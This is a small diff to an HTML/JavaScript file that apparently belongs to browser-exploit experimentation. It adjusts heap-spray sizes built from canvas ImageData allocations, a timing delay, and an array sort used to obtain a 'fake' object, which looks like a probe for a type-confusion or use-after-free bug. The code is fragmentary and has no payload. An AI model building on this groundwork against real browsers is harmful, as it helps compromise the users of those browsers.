--- a/qq.html
+++ b/qq.html
@@ -5,8 +5,8 @@ function lala(){
             var c = document.createElement("canvas");
             var gl = c.getContext("2d");
 
-            for (var i = 0; i < 0x100; i++) {
-                var gggg = gl.createImageData(1, 0x10000)
+            for (var i = 0; i < 0x10; i++) {
+                var gggg = gl.createImageData(1, 0x100000)
                 //var oooo = document.createElement('button')
             }
         } catch (e) {
@@ -17,7 +17,7 @@ function lala(){
       for(var t = Date.now();Date.now() - t <= d;);
     }
 
-    alert(222);
+    alert(333);
     //document.body.offsetParent
 
         var c = document.createElement('canvas')
@@ -47,7 +47,7 @@ function lala(){
     //c[j] = document.createElement('button')
     //c[j].a = 666
     //c[j] = gl.createImageData(1, (0x40-0x10)/4)//{'a':7, 'b':8, 'c':9}
-    c[j] = new String('123456')//{'a':666, 'b':8, 'c':9}
+    c[j] = {'a':666, 'b':8, 'c':9}
     //c[j].toString = function(){alert('ok'); return '666'}
      }
 
@@ -58,7 +58,7 @@ function lala(){
     //document.body.offsetParent;
     a.sort();
     var fake = a[1]
-    alert(fake);
+    alert(fake.a);
 }
     
     try{
